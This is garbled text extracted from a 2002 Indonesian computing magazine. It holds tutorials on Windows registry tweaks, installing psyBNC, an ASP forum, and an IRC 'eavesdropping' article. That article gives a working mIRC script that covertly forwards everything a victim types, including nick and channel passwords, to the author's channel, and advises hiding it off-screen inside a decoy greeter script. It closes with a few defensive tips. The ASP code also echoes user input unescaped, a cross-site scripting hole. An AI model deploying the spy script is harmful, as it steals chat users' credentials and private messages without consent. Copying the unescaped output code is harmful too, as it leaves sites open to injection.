My Computer hkcu\software\classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E} defaultNetwork Neighborhood hkcu\software\classes\clsid\{208D2C60-3AEA-1069-A2D7-08002B30309D} defaultRecycle Bin hkcu\software\ classes\clsid\{645FF040-5081-101B-9F08-00AA002F954E} defaultMy Documents hkcu\software\classes\clsid\{450D8FBA-AD25-11D0-98A8-0800361B1103} defaultInternet Explorer hkcu\software\classes\clsid\{871C5380-42A0-1069-A2EA-08002B30309D} defaultControl Panel hkcu\software\classes\clsid\{21EC2020-3AEA-1069-A2DD-08002B30309D} defaultPrinters hkcu\software\classes\clsid\{2227A280-3AEA-1069-A2DE-08002B30309D defaultDial-Up Networking hkcu\software\classes\clsid\{992CFFA0-F557-101A-88EC-00DD010CCC48} defaultWeb Folders hkcu\software\classes\clsid\{BDEADF00-C265-11D0-BCED-00A0C90AB50F} defaultScheduled Tasks hkcu\software\classes\clsid\{D6277990-4C6A-11CF-8D87-00AA0060F5BF} default

Tabel 2. Tabel Key Registry untuk mengganti nama folder khusus

Nama Ikon Key Registry String Value

My Computer Hkcr\clsid\{20D04FE0-3AEA-1069-A2D8-08002B30309D} TooltipNetwork Neighborhood Hkcr\clsid\{208D2C60-3AEA-1069-A2D7-08002B30309D} TooltipRecycle Bin Hkcr\clsid\{645FF040-5081-101B-9F08-00AA002F954E} TooltipMy Documents Hkcr\clsid\{450D8FBA-AD25-11D0-98A8-0800361B1103} TooltipInternet Explorer Hkcr\clsid\{871C5380-42A0-1069-A2EA-08002B30309D} TooltipControl Panel Hkcr\clsid\{21EC2020-3AEA-1069-A2DD-08002B30309D} TooltipPrinters Hkcr\clsid\{2227A280-3AEA-1069-A2DE-08002B30309D} TooltipThe Internet Hkcr\clsid\ {3DC7A020-0ACD-11CF-A9BB-00AA004AE837} TooltipBriefcase Hkcr\clsid\{85BBD920-42A0-1069-A2E4-08002B30309D} TooltipDial-Up Networking Hkcr\clsid\ {992CFFA0-F557-101A-88EC-00DD010CCC48} TooltipWeb Folders Hkcr\clsid\ {BDEADF00-C265-11D0-BCED-00A0C90AB50F} TooltipScheduled Tasks Hkcr\clsid\ {D6277990-4C6A-11CF-8D87-00AA0060F5BF} Tooltip

Tabel 3. Tabel Key Registry untuk mengganti tooltip folder khusus

Keterangan: hkcr = HKEY_Classes_root

10 NeoTek Juli 2002

NeoTutor

pakah psyBNC itu? PsyBNCmempunyai kegunaan yangsama dengan BNC tetapi mem-

punyai fungsi lebih luas. Dengan psyBNC,misalnya, nick anda akan on terus sela-ma 24 jam sehari dan 7 hari seminggu.Contoh lain kegunaannya adalah dapatmenyembunyikan IP asli anda di IRCdan dari DCC (chat, get, send)

Untuk dapat menginstal psyBNC, andaharus mempunyai shell account tempatuntuk anda menginstalnya. Untuk ituanda dapat mendaftar di provider shellseperti shellindo.com. Untuk lebih jelas,berikut bahasan kami mengenai contohcara menginstal dan menjalankanpsyBNC pada remote shell account,lewat Windows.

A

Decompress PsyBNC tarballJalankan proses dekompresi terhadapfile yang baru kita download denganperintah wget tadi sebagai berikut:$ tar -zxvf psyBNC2.3.tar.gzyang akan mengekstrak file-file kedalam folder psybnc lengkap dengansub-subfolder-nya.

4

10 11

5 6

12

Masuk ke Folder psybncSelanjutnya masuk ke folder psybncyang baru terbentuk tadi denganperintah:$ cd psybncKita siap untuk melakukan proseskompilasi (make) dan konfigurasiterhadap software psyBNC kita.

Kompilasi psyBNCUntuk melakukan proses kompilasiterhadap psyBNC, ketikkan perintah:$ make

Kembali ke mIRC WindowsBuka program irc anda (mIRC). Ubahident anda (akan menjadi usernameanda). Untuk mengubah ident andadi mIRC. Tekan Alt+o cari tulisanident (di Connect | ident) ubahident anda menjadi username yangdiinginkan.

psyBNC Anda Sebagai ServerAgar mIRC mengenali psyBNC yangada di shell anda itu sebagai server,pada status mIRC ketikkan "/serveralamatshellanda.com port" (di sini/server shell.tracenetwork.net 1201)dan tekan tombol Enter.

Password untuk Akses psyBNCSetelah terkoneksi pada serverpsyBNC anda, ketik/quote pass password(password dapat dipilih apa saja).Inilah yang menjadi password anda.Setiap koneksi anda harus memasuk-kan perintah /quote pass password

Instalasi dan menjalankan psyBNC pada remote Unix Shell Account (lewat Windows).

MMEENNGGGGUUNAKNAKAN PSAN PSYYBBNNCCSSAAAAT CT CHAHAT DT DI II IRRCC

BNC (bouncer) digunakan untuk menyembunyikan IP asli di IRC. BNCjuga yang dapat melindungi kita dari nuke atau flood karena shellprovider yang mempunyai high-bandwith bisa menampung kirimanpaket yang banyak. Redi Tya K. membahas versi BNC yang lebihpopuler yaitu psyBNC.

Juli 2002 NeoTek 11

NeoTutor

7

13 14

8 9

15

Edit Konfigurasi PsyBNCSelanjutnya edit file konfigurasipsyBNC (psybnc.conf) dengan texteditor yang ada pada sistem Unix(pico) dengan mengetikkan perintah:$ pico psybnc.confEdit portnya sesuai yg anda inginkan(1201) tekan Ctrl+X untuk keluar danketik Y dan Enter.

Menjalankan psyBNCKini anda siap menjalankan psyBNCanda yang akan listen pada port 1201seperti yang telah anda tetapkan padapsybnc.conf. Ketikkan perintah:$ ./psybncJika tidak ada masalah (error sewaktukompilasi), selesailah instalasi psyBNCdi shell anda.

Instalasi SelesaiJangan lupa men-delete file salt.h difolder psybnc dengan perintah$ rm -rf salt.hKalau keluar tulisan seperti Cannotcreate listening port... aborting,artinya port sudah terpakai atau tidakbisa dipakai. Ulangi Langkah 7 danganti port-nya.

Dalnet Sebagai Server KeduaKetik /addserver irc.dal.net:6667untuk menyambungkan anda ke IRCDalnet. Anda bisa menambahkan IRCserver lebih dari satu. Ketik /bconnectagar anda tersambung ke server IRCdan /bquit untuk memutus sambung-an dari server IRC.

Sharing psyBNC dengan TemanUntuk membagi fasilitas psybnc , ketik/adduser ident:username (/adduserredi:redi). Password akan terbentuksendiri secara acak. Jika ingin meng-ganti password ketik /passwordpassword. Jangan menambah terlalubanyak user; bandwidth akan banyakterpakai dan shell account dapat ditutup.

IP Tersembunyi dengan VhostBiasanya shell provider menyediakanvhost (vanity host) yang bisa andagunakan. Dengan vhost, anda bisamengubah IP anda menjadi misalnyaredi.love.cuttiest.dal-n-e-t.net dll. Bacaketerangan Shell anda atau hubungicostumer service-nya.Selamat mencoba!

1 2 3Download psyBNC tarballDownload psyBNC tarball, yaitupsyBNC2.3.tar.gz pada URL berikutini dengan perintah Unix commandshell wget sebagai berikut:$ wgettakiweb.com/files/psyBNC2.3.tar.gz

Download PuTTYPsyBNC dapat dibuat pada Unix shell.Untuk akses ke Unix shell, downloadPuTTY dan gunakan fasilitas telnetprogram ini. PuTTY dapat diperoleh diwww.chiark.greenend.org.uk/~sgtatham/putty

Telnet ke Unix shellAnda harus sudah mempunyai accountsi Unix shell yang mendukung fasilitasBNC atau PsyBNC. Dalam hal inidigunakan shell.traceroute.net.Jalankan PuTTY dan telnet ke shellanda. (host: shell.tracenetwork.net port:23)

NeoTutor

12 NeoTek Juli 2002

ADA SAAT ANDAchat di IRC (In-ternet Relay Chat),

pernahkah terbersit di benakanda untuk mengetahui apayang sedang dibicarakanorang lain, teman anda, ataumungkin pacar anda denganlawan bicaranya? Dan kepadasiapa-siapa saja orang terse-but ngobrol (chat) secara pri-badi (private) pada saat itu?

Pertanyaan berikutnya, per-nahkah terlintas di benak an-da untuk “mencuri” katasandi channel atau nick oranglain agar anda memperolehakses sebagai OP dan founderpada suatu channel di IRC?Jika jawaban anda terhadappertanyaan-pertanyaan diatas adalah “Ya,” maka andadapat meneruskan membacaartikel ini.

Konsepnya sangat sederhanayaitu membuat skrip yangditulis dengan menggunakanbahasa skrip IRC. Skrip se-derhana ini kemudian akandikirim ke orang lain untukdi-load oleh program mIRCatau PIRCH yang merekajalankan. Dengan demikian,saat komputer teman andatadi terhubung ke Internet,lalu menjalankan programmIRC dan menghubungkan-

nya ke server IRC, maka tan-pa disadarinya semua yangdiketik (baik itu dari jendelastatus, channel, atau jendelaquery) akan dikirimkan lang-sung kepada anda. Denganbegitu anda akan tahu dengansiapa saja orang tersebut bica-ra, apa saja yang diketik/dibicarakan. Jika diibaratkansebagai email, maka andaakan selalu menerima carboncopy-nya, lengkap tanpa adasatu huruf atau kalimat yangtertinggal. Jadi bisa dibayang-

kan betapa senangnya andapada saat teman anda tadimulai mengetik, dan tidaklama kemudian di jendelamIRC anda tiba-tiba munculteks seperti ini:

• /nickserv identify blablabla

• /chanserv identify#neohacker blablabla

• /servershell.hacker.com.br:9001blablabla.

Informasi di atas berharga

untuk anda karena denganitu anda akan memperolehakses sebagai founder padachannel orang yang menge-tik perintah tersebut, di sam-ping informasi lainnya yangbuat anda mungkin ada man-faatnya. Untuk membantuanda memahami apa yangsaya maksudkan, silakansimak Gambar 1 di atas.

Dalam ilustrasi gambartersebut terlihat bahwa userA sedang asyik ngobrol (chat)

PPembicarembicaraan di Iaan di I RRCCNgNgupinguping

Suatu saat anda mungkin iseng ingin mengetahui isi pembicaraan para peserta chat di IRC. Anda dapat‘menyadap’ obrolan mereka dengan menggunakan skrip yang dapat anda buat sendiri. Berdasarkan

pengalamannya, Eryanto Sitorus menyajikan caranya untuk anda.

P

• Gambar 1. Menyadap pembicaraan di IRC (Internet Relay Chat)

NeoTutor

Juli 2002 NeoTek 13

bersama user B. Sementaraitu, user C yang jauh di sebe-rang sana juga terlihat asyikmengamati setiap pesan yangmuncul di jendela programmIRC-nya yang dikirim olehuser A pada saat ngobroldengan user B.

Jika anda tertarik, dan inginmelihat langsung efeknya,ketiklah listing skrip di bawahini dengan menggunakaneditor NotePad, kemudiansimpan ke dalam direktoriprogram mIRC Anda dengannama file test.ini.

Setelah itu aktifkan filetersebut dengan melakukanbeberapa hal sebagai berikut:

1. Jalankan program mIRCanda dan hubungkan ke salahsatu server IRC yang biasaanda masuki. Lalu masuklah(join) ke channel #neohacker.

2. Buka satu lagi programmIRC Anda lalu hubungkanke server IRC yang sama de-

ngan program mIRC pertamatadi.

3. Pada jendela status programmIRC yang ke dua, ketik kanperintah ini:

• /load -rs test.ini• /remote on

Setelah itu mulai lah menge-tik sembarang teks, misalnyamengetik perintah untukidentify nick atau channelanda, atau chat dengan userlain.

5. Lalu buka (restore) pro-gram mIRC yang pertama,dan lihat apa yang terjadi. Se-mua yang anda ketik padajendela mIRC yang keduatadi terlihat semua denganjelas di jendela #neohacker,sebagaimana yang diperlihat-kan pada Gambar 2 di bawahini.

Pada gambar tersebut terlihatbahwa seseorang yang meng-gunakan nick tricksy perta-ma-tama melakukan identifynick dengan kata sandietherz111. Dan setelah itutricksy melakukan identifyterhadap channel-nya#medan dengan passwordchx14282, yang kemudiandilanjutkan dengan mengetikperintah /join untuk masukke channel #medan. Masing-masing ketiga buah perintahtersebut diketik tricksy daridalam jendela status (StatusWindow) program mIRC-nya. Selanjutnya pada bariske 4, 5, dan 6, teks yangterlihat adalah merupakanpesan yang diketik tricksydari jendela channel #medan.

6. Jalankan program WindowsExplorer Anda, lalu browse

folder C:\WINDOWS\TEMP. Kemudian klik duakali file arsip.txt, hasilnya akanterlihat sama dengan yangterlihat pada jendela #neo-hacker. Namun pada filearsip.txt ada sedikit penam-bahan, yaitu nick dan alamatIP yang bersangkutan. Tuju-annya adalah agar anda selalumengetahui identitas useryang aktif pada saat itu. Ben-tuk tampilannya diperlihat-kan pada Gambar 3.

Agar para user yang menda-patkan file skrip yang andatulis tadi nantinya tidak akanmenyadari adanya bahayajika skrip tersebut di-loadoleh program mIRC yangmereka jalankan, maka Andaharus menyembunyikannyaserapi mungkin. Ada bebera-pa skenario yang bisa andaterapkan untuk menyembu-nyikan potongan skrip diatas. Beberapa di antaranyaadalah sebagai berikut:

1. Menyisipkannya di antaraskrip lain, misalnya skripscramble yang saat ini masihdiminati sebagian besar userdi IRC.

2. Membuatkan skrip tam-bahan untuk melakukanfungsi-fungsi lain sebagaikamuflase. Misalnya fungsiinviter untuk mengundanguser secara otomatis (autojoin) ke dalam channel ter-tentu, memberi pesan “sayhello” secara otomatis padauser baru yang baru sajamasuk (on join), atau pinguntuk mem-ping secara oto-matis pada saat skrip mende-teksi kata !ping, dan lain se-bagainya. Tujuannya adalahuntuk mengalihkan perhatianuser agar tidak terfokus keskrip yang berbahaya tadi.Dan pada saat orang tersebut

[script]n0=on 1:INPUT:*:{.msg #neohacker $active $+: $1- | writec:\windows\temp\arsip.txt<$+ $nick $+ @ $+ $ip $+ >$active $+ : $1- }

• Gambar 2. Membaca teks yang berhasil disadap di channel #neohacker.

• Gambar 3. Membaca log yang tersimpan dalam file arsip.txt

NeoTutor

14 NeoTek Juli 2002

memeriksa kotak RemoteScript-nya, maka yang akanterlihat adalah seperti padaGambar 4.

Pada gambar di atas, perintahyang diapit oleh tanda kura-wal {} pada baris perintah on1:INPUT:*: tidak terlihat,karena telah digeser jauh-jauh ke arah samping kananjendela kotak Remote Script.Cara seperti ini sering digu-nakan untuk mengelabui useryang ceroboh. Dan terbukti,banyak user yang terperang-kap karena tidak mengetahuikalau program mIRC-nyatelah me-load sesuatu yangberbahaya. Apakah karenamereka sudah tidak sabaranlagi ingin chat dengan orang-orang yang dianggapnyasebagai pacar? Dan tidaksempat meluangkan waktu-

nya sedikit untuk memeriksaoptions pada programmIRCnya? Entahlah!. :)

Contoh listing-nya terlihatpada boks listing skrip dibawah.

Ketik listing skrip tersebut,lalu simpan ke dalam direkto-ri program mIRC anda dengannama file script.ini. Setelahitu aktifkan dengan mengetikperintah berikut:

• /load -rs script.ini• /remote on

Yang menarik dari skrip ter-sebut (di baris n8) adalah, bah-wa pada saat perintah sendmsg dilaksanakan maupunpada saat pesan ditulis ke da-lam file arsip.txt, tidak terlihatadanya pesan pengiriman dijendela status mIRC.

Gambar 5. Pesan pengiriman

teks tidak terlihat

Bandingkan jika Andamenuliskannya seperti ini :

on 1:INPUT:*:{msg#neohacker $active $+ : $1- |write c:\windows\temp\arsip.txt < $+ $nick $+ @ $+ $ip$+ > $active $+ : $1- }

Pada saat perintah selesai di-laksanakan, maka bersamaandengan itu pula akan munculpesan status yang menyirat-kan adanya proses pengirim-an pesan kepada seseorang,seperti yang tampak padaGambar 6 di bawah ini.

Jadi jelas lah sudah, bahwasiapa pun orang yang me-

load skrip tersebut di atasakan mengirimkan semuateks yang mereka ketik kedalam channel #neohacker,sesuai dengan target yanganda set. Tetapi, setelah itumungkin anda akan bertanyaseperti ini, “Ntar gimanadong kalau gue engga onlinepada saat itu? Kan gue enggabisa melihat teks yang mere-ka ketik!?”. Sebagai jawaban-nya saya menyarankan andamemanfaatkan Eggdrop (Bot)(dibahas pada NeoTek Vol II,No. 9) atau PsyBNC (dibahaspada nomor ini, hlm. 14-15).Kemudian ganti target pengi-rimannya kepada nick Egg-drop atau PsyBNC anda.

• Gambar 4. Melihat listing skrip dalam kotak Remote Script. • Gambar 5 Pesan pengiriman teks tidak terlihat.

[script]n0=on 1:JOIN:#:{n1= if ($nick != $me) {n2= msg $chan Hello $lower($nick) $+ !n3= msg $chan apa kabar nih bro ? :)n4= invite $nick #neohackern5= }n6=}n7=n8=on 1:INPUT:*:{.msg #neohacker $active $+ : $1- | writec:\windows\temp\arsip.txt < $+ $nick $+ @ $+ $ip $+ >$active $+ : $1- }n9=on 1:TEXT:!ping:*:{n10= if ($nick != $me) {n11= ping $nick n12= }n13=}

• Gambar 6 Pesan pengiriman teks tidak terlihat.

Sebagai contoh misalnya nickPsyBNC anda adalah instantia,maka skripnya akan terlihatseperti ini:

on 1:INPUT:*:{.msg instantia$active $+ : $1- }

Lalu pada saat anda online,dan terhubung kembali kePsyBNC pada hari berikutnya,maka anda cukup mengetik-kan perintah /QUOTEPLAYPRIVATELOG untukmembaca semua pesan (mes-sages) yang terekam dalamfile log PsyBNC anda. Gam-pang sekali bukan? :)

Tapi anda jangan terburu

happy karena masih ada satupersoalan yang harus andacari jalan keluarnya, yaitubagaimana cara mengirimkanfile skrip yang anda tulis tadike dalam PC orang lain?

Sementara anda memikirkanteknik yang jitu untuk mele-takkan file skrip tersebut kedalam PC orang lain, sayajuga ingin mengingatkanpembaca yang lain tentangbeberapa hal berikut:

1. Berhati-hati lah jika Andachat dari komputer oranglain, khususnya bagi Andapelanggan setia Warnet.

2. Waspadai rekan di sebelahanda. Karena siapa tahu rekananda sedang iseng, lalu men-jebak anda dengan skrip tadi.

3. Jika Anda tidak sempat/malas memeriksa kotakRemote Script beserta semuaopsi pada program mIRCyang sedang anda jalankan,maka biasakan untuk selalumengetik perintah-perintahdi bawah ini terlebih dahulusebelum anda benar-benarterhubung ke server IRC:• /unload -rs script.ini• /remote off• /log off

4. Jika anda sempat, tekan

tombol ALT+R untuk me-munculkan kotak RemoteScript pada program mIRCAnda, dan pastikan bahwatidak ada skrip yang di-load.

5. Jangan sembarang mene-rima (get) skrip yang dikirimorang lain, sekali pun yangmengirimkannya adalahteman anda sendiri.

6. Klik menu DCC → Op-tions → Send pada programmIRC anda untuk memasti-kan bahwa event On SendRequest berada pada posisiShow get dialog atau IgnoreAll.

NeoTutor

Juli 2002 NeoTek 15

• Gambar 7. Membaca pesan/informasi yang tersimpan dalam file log psyBNC

• Gambar 8 Memeriksa kotak Remote Script. • Gambar 9 Mmeriksa On Send pada DCC Options program mIRC.

NeoTutor

16 NeoTek Juli 2002

ETIAP ORANG YANG MEMILIKI HALAMAN Web pastimengharapkan agar halamannya itu bersifat inter-aktif. Untuk mewujudkannya, webmaster dari web

tersebut dapat menambahkan beberapa fitur seperti Polling,Buku Tamu, Counter, Forum dan masih banyak lagi. Andabisa mendapatkannya di beberapa situs portal di internetyang menyediakannya dengan gratis. Namun kali ini, kitaakan mencoba untuk membuatnya sendiri dengan meng-gunakan ASP. Kali ini kita akan membuat forum namunbukan forum biasa, melainkan forum ala mailing list(milis) sehingga akan lebih interaktif.

Untuk membuatnya kita memerlukan enam buah fileyang akan kita buat satu per satu.

1. File adovbs.incFile ini merupakan file yang harus diikutsertakan bilaanda akan menggunakan basisdata. Dalam file ini terdapatkonstanta-konstanta yang diperlukan oleh metode ADO.File ini dapat anda temukan di C:\Program Files\CommonFiles\System\ADO.

2. Database untuk menyimpan data (forum.mdb)Untuk basisdata, kita akan menggunakan Microsoft Accessuntuk membuatnya.Ikuti langkah-langkah di bawah ini:

S

Aplikasi ASAplikasi ASP di Situs WP di Situs WebebFForum ala Milisorum ala Milis

Untuk menambah fitur interaktif pada halaman Web, anda dapat menambahkan forum semacammilis di dalamnya dan forum itu dapat dibuat secara sederhana dengan menggunakan ASP. David

Sugianto menjelaskannya kepada anda dengan uraian yang mudah dipahami.

Buka Microsoft Access, pilih “BlankAccess Database.” Klik OK.

Simpan database yang dibuat dengannama forum, lalu klik Create

Klik dua kali “Create Table inDesign View.”

Simpan tabel dengan nama data,lalu tutuplah Microsoft Access.

Isi kolom diatas dengan:

Field Name Data TypeID AutoNumberTanggal Date/TimeJam Date/TimeNama TextEmail TextTopik TextIsi MemoKeterangan lain:Isi Field Size untukNama = 30, Email = 30, Topik = 70ID sebagai Primary Key-nya

1 2 3

4 5

NeoTutor

Juli 2002 NeoTek 17

3. Halaman untuk Form (formforum.asp)Ketikkan kode berikut pada editor kesayangan anda:

Hasilnya akan seperti gambar berikut:

Pada halaman ini, pengunjung dapat mengisi formulir yangdisediakan berupa nama, email, topik yang akan dibicarakan,dan isi pembahasan. Keistimewaan formulir ini ialah dapatberlaku seperti compose di milis, yang jika pengunjung inginmenjawab suatu suatu topik, maka formulir ini akan otomatismengisi topik dengan tambahan huruf “Re:” pada topik yangakan dijawab. Untuk itu gunakan kode ASP.

<% If NOT Kat = “” Then If NOT testre = “Re” ThenResponse.Write “Re:” &KatElseResponse.Write KatEnd IfEnd If%>

Yang sebelumnya ada scripting berupa:<%Kat = Request.QueryString(“kat”)testre = left(Kat, 2)%>

untuk memeriksa agar tidak ada penulisan “Re:” dua kali.

4. Halaman untuk ucapan Terima Kasih danmemasukkan data ke database (thanks.asp)

<html><head><title>Forum</title></head><body><h1><b>Forum</b></h1><hr><%Kat = Request.QueryString("kat")testre = left(Kat, 2)%><form method="POST" action="thanks.asp"><pre>

Nama : <input type="text" name="txtnama"size="22">

E-mail : <input type="text" name="txtemail"size="22"></pre><div align="center"><pre>Topik :<input type="text" name="txttopik" size="51"value=<% If NOT Kat = "" ThenIf NOT testre = "Re" ThenResponse.Write "Re:" &KatElseResponse.Write KatEnd IfEnd If%>>

Isi<textarea rows="5" cols="40"name="txtisi"></textarea></pre></div><p align="center">

<input type="submit" value="Kirim"><input type="reset" value="Reset">

</form>

<html><head><title>Forum</title></head><body><% If Request.Form("txtnama") = "" ThenResponse.Write "Anda belum mengisi <b>nama</b> anda"ElseIf Request.Form("txtemail") = "" Then|Response.Write "Anda belum mengisi <b>e-mail</b> anda "ElseIf InStr(Request.Form("txtemail"),"@") = 0 ThenResponse.Write "E-mail anda tidak valid"ElseIf Request.Form("txttopik") = "" ThenResponse.Write "Anda belum mengisi <b>Topik</b> anda"ElseIf Request.Form("txtisi") = "" ThenResponse.Write "Anda belum mengisi <b>Kolom Isi</b> anda"Else %><!--#Include File="adovbs.inc"--><%Dim objConnDim objCommDim objParDim strSQLDim PathDim reqTanggalDim reqJamDim reqNamaDim reqEmailDim reqTopikDim reqIsireqTanggal = DatereqJam = TimereqNama = Request.Form("txtnama")reqEmail = Request.Form("txtemail")reqTopik = Request.Form("txttopik")reqIsi = Request.Form("txtisi")Path = Server.MapPath("forum.mdb")strSQL = "INSERT INTO Data (Tanggal, Jam, Nama, Email, Topik,Isi) VALUES (?, ?, ?, ?, ?, ?)"Set objConn = Server.CreateObject("ADODB.Connection")objConn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & PathSet objComm = Server.CreateObject("ADODB.Command")objComm.ActiveConnection = objConnobjComm.CommandText = strSQLSet objPar = objComm.CreateParameter(, adDate, ,8, reqTanggal)objComm.Parameters.Append objParSet objPar = objComm.CreateParameter(, adDate, ,8, reqJam)objComm.Parameters.Append objParSet objPar = objComm.CreateParameter(, adChar, ,30, reqNama)objComm.Parameters.Append objParSet objPar = objComm.CreateParameter(, adChar, ,30, reqEmail)objComm.Parameters.Append objParSet objPar = objComm.CreateParameter(, adChar, ,70, reqTopik)objComm.Parameters.Append objParSet objPar = objComm.CreateParameter(, adChar, ,65535, reqIsi)objComm.Parameters.Append objParobjComm.Execute%><p align="center"><font size="5"><b>Terima Kasih Atas Partisipasi Anda,<%=reqNama%></b></font></p><hr><p align="center"><font size="3">Topik :<b><%=reqTopik%></b></font><p align="center"><font size="6"><b>TelahTerposting<%objConn.Close%></b></font><%end if%><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><a href="formforum.asp">Join Forum</a></p><p align="center"><a href="list.asp">Ruang Forum</a></p></body></html>

NeoTutor

18 NeoTek Juli 2002

Ketikkan kode di atas ini ke teks editor kesayangan anda.Hasilnya akan tampak seperti yang berikut:

Penjelasan skrip ASP:<% If Request.Form("txtnama") = "" Then Response.Write "Anda belum mengisi <b>nama</b> anda"ElseIf Request.Form("txtemail") = "" Then Response.Write "Anda belum mengisi <b>e-mail</b> anda " ElseIf InStr(Request.Form("txtemail"),"@") = 0 Then Response.Write "E-mail anda tidak valid" ElseIf Request.Form("txttopik") = "" Then Response.Write "Anda belum mengisi <b>Topik</b> anda"ElseIf Request.Form("txtisi") = "" Then Response.Write "Anda belum mengisi <b>Kolom Isi</b> anda"

Skrip ini berfungsi untuk memeriksa apakah pengisianformulir telah benar. Maksudnya, semua field yang ada diformulir yang berupa field Nama(txtnama), Email(txtemail),Topik(txttopik), Isi(txtisi) harus sudah diisi. Skrip ini jugamemeriksa apakah field email telah terisi dan valid. Untukmenentukan valid atau tidaknya suatu email, kita meng-gunakan logika sederhana. Setiap alamat email harusmenggunakan karakter '@' dan kita menggunakan kuncikarakter tersebut untuk memeriksa email yang diisi. Jikadalam pengisian email terdapat karakter tersebut, makakita berasumsi bahwa email yang dimasukkan valid. Jikasemua field telah terisi dengan benar, maka akan dilan-jutkan dengan pemrosesan halaman thanks.asp yangsesungguhnya.

Dim objConnDim objCommDim objParDim strSQLDim PathDim reqTanggalDim reqJamDim reqNamaDim reqEmailDim reqTopikDim reqIsireqTanggal = DatereqJam = TimereqNama = Request.Form("txtnama")reqEmail = Request.Form("txtemail")reqTopik = Request.Form("txttopik")reqIsi = Request.Form("txtisi")

Semua variabel yang akan kita gunakan dideklarasikanterlebih dahulu dengan menggunakan perintah 'Dim'.Serta menerima data yang dikirim melalui formulir danmenyimpannya ke dalam veriabel tertentu.

Path = Server.MapPath("forum.mdb")strSQL = "INSERT INTO Data (Tanggal, Jam, Nama, Email,Topik, Isi) VALUES (?, ?, ?, ?, ?, ?)"Set objConn = Server.CreateObject("ADODB.Connection")objConn.Open "Provider=Microsoft.Jet.OLEDB.4.0;DataSource=" & PathSet objComm = Server.CreateObject("ADODB.Command")objComm.ActiveConnection = objConnobjComm.CommandText = strSQL

Kini kita akan membuat koneksi ke database yang ber-nama “forum.mdb” yang telah kita buat dan menentukannama tabel dan field-field yang akan menjadi tujuanpenyimpanan data.

Set objPar = objComm.CreateParameter(, adDate, ,8, reqTanggal)objComm.Parameters.Append objParSet objPar = objComm.CreateParameter(, adDate, ,8, reqJam)objComm.Parameters.Append objParSet objPar = objComm.CreateParameter(, adChar, ,30, reqNama)objComm.Parameters.Append objParSet objPar = objComm.CreateParameter(, adChar, ,30, reqEmail)objComm.Parameters.Append objParSet objPar = objComm.CreateParameter(, adChar, ,70, reqTopik)objComm.Parameters.Append objParSet objPar = objComm.CreateParameter(, adChar, ,65535, reqIsi)objComm.Parameters.Append objParobjComm.Execute

Kini tugas yang paling akhir ialah memasukkan data-datake dalam masing-masing field dengan menentukan tipedata dan besar field yang harus sesuai dengan database.

5. Halaman untuk menampilkan daftar forumyang telah masuk ke database (list.asp)Ketikkan kode berikut pada editor kesayangan anda:

<html><head><title>Forum</title></head><body><p align="center"><font size="5"><b>Ruang Forum</b></font></p><hr><p><!--#Include File="adovbs.inc"--><%Dim objConnDim ObjRsetDim filePathDim strSQLDim tombolDim hlmDim ifilePath = Server.MapPath("forum.mdb")strSQL = "SELECT * FROM data ORDER BY Tanggal DESC, Jam DESC"Set objConn = Server.CreateObject("ADODB.Connection")objConn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & filePathSet objRset = Server.CreateObject("ADODB.Recordset")objRset.Open strSQL, objConn, adOpenStaticobjRset.PageSize = 50%><%tombol = Request.Form("tombol")If Request.Form("hlm") = "" Then

hlm = 1Else

hlm = Request.Form("hlm")End If%><%If tombol = "Sebelumnya" or tombol = "Selanjutnya" ThenSelect Case tombolCase "Sebelumnya"

If hlm > 1 Thenhlm = hlm - 1

Else

Hasilnya akan ampak seperti berikut:

Keterangan skrip ASPDim objConnDim ObjRsetDim filePathDim strSQLDim tombolDim hlmDim ifilePath = Server.MapPath("forum.mdb")strSQL = "SELECT * FROM data ORDER BY Tanggal DESC,Jam DESC"Set objConn = Server.CreateObject("ADODB.Connection")objConn.Open "Provider=Microsoft.Jet.OLEDB.4.0;DataSource=" & filePathSet objRset = Server.CreateObject("ADODB.Recordset")objRset.Open strSQL, objConn, adOpenStaticobjRset.PageSize = 50

Skrip di atas berfungsi mendeklarasikan variabel-variabelyang akan kita gunakan, lalu membuka koneksi kebasisdata bernama “forum.mdb” dan mengaktifkan tabel“data” dengan memprioritaskan Tanggal dan Jam secaradescending. Skrip juga membatasi data yang akan tampildi layar sebanyak 50 data per halaman.

tombol = Request.Form("tombol")If Request.Form("hlm") = "" Then

hlm = 1Else

hlm = Request.Form("hlm")End If

Menentukan halaman forum yang aktif pada saat ini.If tombol = "Sebelumnya" or tombol = "Selanjutnya" ThenSelect Case tombolCase "Sebelumnya"

If hlm > 1 Thenhlm = hlm - 1

Elsehlm = 1

End IfCase "Selanjutnya"

If objRset.AbsolutePage < objRset.PageCount Thenhlm = hlm + 1

Elsehlm = objRset.PageCount

End IfCase Else

hlm = 1End SelectEnd IfObjRset.AbsolutePage = hlm

Skrip di atas berfungsi mengatur halaman-halaman forumkita, bergantung pada kondisi tombol yang ditekan.

<%For i = 1 to objRset.PageSize%></font></b>

<TR><TD width="17%"> <font size="2"><%=objRset("Tanggal")%>,<%=objRset("Jam")%></font></TD><TD width="25%"> <font size="2"><%=objRset("Nama")%> </font> </TD><TD> <font size="2"> <AHREF="isiforum.asp?kat=<%=objRset(5)%>"><%=objRset("Topik")%></a></font><%objRset.MoveNextIf objRset.EOF Then

Exit ForEnd IfNext%>

NeoTutor

Juli 2002 NeoTek 19

hlm = 1End If

Case "Selanjutnya"If objRset.AbsolutePage < objRset.PageCount Then

hlm = hlm + 1Else

hlm = objRset.PageCountEnd If

Case Elsehlm = 1End SelectEnd IfObjRset.AbsolutePage = hlm%><%tampilan = objRset.PageSize * hlm

If tampilan > objRset.RecordCount Thentampilan = objRset.RecordCount

End IfResponse.Write tampilan & " Dari " & objRset.RecordCount & " Total Data"%><TABLE BORDER=1 bordercolor="#333333" bgcolor="#F0F0F0" width="100%"><TR><TD width="17%" align="center" bgcolor="#000000"> <b><font color="#FFFFFF">Diterima</font></b></TD><TD width="25%" align="center" bgcolor="#000000"> <b><font color="#FFFFFF">Dari</font></b></TD><TD align="center" bgcolor="#000000"><b><fontcolor="#FFFFFF">Subject<%For i = 1 to objRset.PageSize%>

</font></b><TR><TD width="17%"> <font size="2"> %=objRset("Tanggal")%>,<%=objRset("Jam")%></font></TD>

<TD width="25%"> <font size="2"> <%=objRset("Nama")%> </font> </TD><TD> <font size="2"> <A HREF="isiforum.asp?kat=<%=objRset(5)%>"><%=objRset("Topik")%></a></font><%objRset.MoveNextIf objRset.EOF Then

